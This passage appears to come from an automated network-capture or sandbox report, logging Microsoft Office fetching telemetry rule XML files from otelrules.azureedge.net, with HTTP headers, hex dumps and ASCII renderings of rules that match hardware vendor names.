                                                                                                                                                                                                            2024-11-22 03:27:03 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            29192.168.2.44985613.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:03 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:04 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:03 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 427
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BA310DA18"
                                                                                                                                                                                                            x-ms-request-id: 922c5f4e-601e-005c-577c-3bf06f000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032703Z-174c587ffdfl22mzhC1TEBk40c00000000x000000000pd18
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:04 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            30192.168.2.44985713.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:03 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:04 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:03 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 486
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B9018290B"
                                                                                                                                                                                                            x-ms-request-id: ad60cd0f-c01e-008e-6f6a-3c7381000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032703Z-174c587ffdfb5q56hC1TEB04kg00000000q000000000pe73
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:04 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            31192.168.2.44985813.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:03 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:04 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 407
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B9698189B"
                                                                                                                                                                                                            x-ms-request-id: d1e74057-c01e-0014-6563-3ba6a3000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032704Z-178bfbc474b9xljthC1NYCtw9400000002d0000000001abu
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:04 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            32192.168.2.44986113.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:05 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:05 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 469
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BBA701121"
                                                                                                                                                                                                            x-ms-request-id: d02e2b11-101e-00a2-2d3a-3c9f2e000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032705Z-178bfbc474bh5zbqhC1NYCkdug000000026g00000000rrg2
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:05 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            33192.168.2.44986213.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:05 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:06 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:06 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 415
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BA41997E3"
                                                                                                                                                                                                            x-ms-request-id: 9bf3f441-f01e-003f-246b-3bd19d000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032706Z-178bfbc474bnwsh4hC1NYC2ubs00000002cg00000000kue2
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:06 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            34192.168.2.44986313.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:05 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:06 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:06 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 464
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B97FB6C3C"
                                                                                                                                                                                                            x-ms-request-id: 190bcf01-801e-0078-3650-3cbac6000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032706Z-15b8b599d885v8r9hC1TEB104g00000000w000000000cq75
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:06 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            35192.168.2.44986413.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:05 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:06 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:06 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 477
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB8CEAC16"
                                                                                                                                                                                                            x-ms-request-id: 76a157b4-e01e-00aa-258c-3aceda000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032706Z-174c587ffdfmrvb9hC1TEBtn3800000000vg00000000cdpc
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:06 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            36192.168.2.44986513.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:06 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:06 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:06 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 494
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB7010D66"
                                                                                                                                                                                                            x-ms-request-id: 44e9982d-301e-001f-6639-3caa3a000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032706Z-15b8b599d88z9sc7hC1TEBkr4w0000000120000000003wm9
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:06 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            37192.168.2.44986613.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:07 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:08 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:07 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 419
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B9748630E"
                                                                                                                                                                                                            x-ms-request-id: a56dfe0e-901e-0029-2976-3b274a000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032707Z-174c587ffdftjz9shC1TEBsh9800000000u0000000001wy6
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:08 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            38192.168.2.44986713.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
